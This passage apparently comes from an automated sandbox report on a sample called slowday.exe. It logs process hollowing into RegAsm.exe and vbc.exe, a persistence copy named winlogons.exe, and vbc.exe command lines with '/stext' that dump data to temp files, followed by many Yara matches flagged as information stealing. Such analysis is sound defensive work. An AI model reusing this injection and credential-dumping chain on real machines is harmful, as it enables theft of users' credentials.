            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 21F008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3AF008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3FE008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 301008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 262008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 204008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3E7008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 362008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 307008
            Source: 0.3.slowday.exe.3b50000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 1.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 1.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 1.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 7.3.winlogons.exe.3790000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 8.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 8.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 8.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: C:\Users\user\Desktop\slowday.exe | Code function: 0_2_00DC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\slowday.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp33E2.tmp"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8255.tmp"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp"
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp36CB.tmp"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp43C.tmp"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp4F4.tmp"
            Source: slowday.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: RegAsm.exe, 00000001.00000002.507261968.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: slowday.exe | Binary or memory string: Shell_TrayWnd
            Source: winlogons.exe, 00000007.00000003.281870981.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.270071702.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.269434060.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [CLASS:Progman]
            Source: C:\Users\user\Desktop\slowday.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\slowday.exe | Code function: 0_2_00DF5007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 2_2_004083A1 GetVersionExW

            Stealing of Sensitive Information

            Source: Yara match | File source: 35.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.4b4834a.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.f1834a.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.3.RegAsm.exe.43bb8f2.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.RegAsm.exe.47c35a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.ec0345.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.4af0000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.6abdc50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.RegAsm.exe.481b8f2.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.RegAsm.exe.47c38ed.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.4b4834a.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.3.RegAsm.exe.43bb8f2.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.RegAsm.exe.481b8f2.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.3.RegAsm.exe.43635a8.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.3.RegAsm.exe.43635a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.ec0000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.RegAsm.exe.47c35a8.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 35.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.3.RegAsm.exe.43638ed.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.f1834a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.4af0000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.6771c10.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.4af0345.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.680dc50.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.6a21c10.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.66d5bd0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.6985bd0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.508932595.0000000003234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.509181368.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2988, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3004, type: MEMORYSTR
            Source: Yara match | File source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
